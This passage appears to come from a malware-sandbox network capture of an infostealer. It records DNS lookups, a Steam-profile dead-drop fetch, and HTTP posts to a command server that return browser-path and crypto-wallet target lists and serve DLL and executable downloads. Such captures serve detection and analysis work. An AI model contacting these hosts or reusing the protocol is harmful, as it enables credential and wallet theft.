                                                                                                                                                                  Oct 3, 2024 03:36:19.465943098 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.466123104 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.466146946 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.466228008 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.473042011 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.473056078 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.473198891 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.473212957 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.473293066 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.484735012 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.484747887 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.484889030 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.484903097 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.484975100 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.494110107 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.494124889 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.494297028 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.494309902 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.494391918 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.498523951 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.498537064 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.498681068 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.498693943 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.498768091 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.517508984 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.517529964 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.517843008 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.517884016 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.517939091 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.531948090 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.531961918 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.532054901 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.532062054 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.532219887 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.542205095 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.542217970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.542370081 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.542402983 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.542578936 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.552666903 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.552680969 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.552826881 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.552843094 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.553011894 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.559787989 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.559802055 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.559940100 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.559953928 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.560169935 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.571491957 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.571508884 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.571604013 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.571630001 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.571686983 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.581173897 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.581190109 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.581435919 CEST49738443192.168.2.649.12.197.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 03:35:51.415795088 CEST | 65488 | 53 | 192.168.2.6 | 1.1.1.1
Oct 3, 2024 03:35:51.434575081 CEST | 53 | 65488 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 03:35:51.415795088 CEST | 192.168.2.6 | 1.1.1.1 | 0x174e | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 03:35:51.434575081 CEST | 1.1.1.1 | 192.168.2.6 | 0x174e | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false

                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                  • 49.12.197.9
                                                                                                                                                                  • 147.45.44.104
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49746 | 147.45.44.104 | 80 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 03:36:29.767966032 CEST | 183 | OUT | GET /ldms/a43486128347.exe HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 147.45.44.104
                                                                                                                                                                  Cache-Control: no-cache
Oct 3, 2024 03:36:30.410010099 CEST | 314 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:30 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 13
                                                                                                                                                                  Last-Modified: Thu, 03 Oct 2024 01:25:21 GMT
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Keep-Alive: timeout=120
                                                                                                                                                                  ETag: "66fdf281-d"
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Data Raw: 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72
                                                                                                                                                                  Data Ascii: Unknown error


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49721 | 104.102.49.254 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:35:52 UTC | 119 | OUT | GET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:35:52 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:52 GMT
                                                                                                                                                                  Content-Length: 34879
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: sessionid=55e4903681e22a91514c299f; Path=/; Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49722 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:35:53 UTC | 184 | OUT | GET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:35:54 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:54 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
2024-10-03 01:35:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49723 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:35:54 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJ
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 255
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:35:54 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 46 34 33 39 35 37 36 36 36 43 31 31 38 30 30 38 36 39 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 2d 2d 0d 0a
                                                                                                                                                                  Data Ascii: ------FIDAFCAFCBKECBGCFIIJContent-Disposition: form-data; name="hwid"ABF43957666C118008692-a33c7340-61ca------FIDAFCAFCBKECBGCFIIJContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------FIDAFCAFCBKECBGCFIIJ--
2024-10-03 01:35:55 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:55 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
2024-10-03 01:35:55 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 3a1|1|1|1|5640526ca290fd017aaabb5cd61ff2dd|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49724 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:35:56 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKK
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:35:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------AKJDGIEHCAEHIEBFBKKKCont
2024-10-03 01:35:57 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:56 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:35:57 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                  Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49725 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:35:57 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAK
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:35:57 UTC | 331 | OUT | Data Ascii: ------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------BFBAAFHDHCBGCAKFHDAKCont
2024-10-03 01:35:58 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:58 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
2024-10-03 01:35:58 UTC | 5685 | IN | Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49726 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:35:59 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGI
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:35:59 UTC | 332 | OUT | Data Ascii: ------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------CAFHIJDHDGDBFHIEHDGICont
2024-10-03 01:35:59 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:59 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
2024-10-03 01:35:59 UTC | 119 | IN | Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49727 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:00 UTC | 277 | OUT | POST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DGDBAKKJKKECGDGCAECA
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 6069
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:36:00 UTC | 6069 | OUT | Data Ascii: ------DGDBAKKJKKECGDGCAECAContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------DGDBAKKJKKECGDGCAECAContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------DGDBAKKJKKECGDGCAECACont
2024-10-03 01:36:01 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:01 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
2024-10-03 01:36:01 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49728 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:01 UTC | 192 | OUT | GET /sqlp.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:36:02 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:02 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 2459136
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:02 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes
2024-10-03 01:36:02 UTC | 16121 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49729 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:04 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 829
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:04 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------DHCAAEBKEGHJKEBFHJDBCont
2024-10-03 01:36:05 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:05 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
2024-10-03 01:36:05 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49730 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:06 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHI
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 437
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
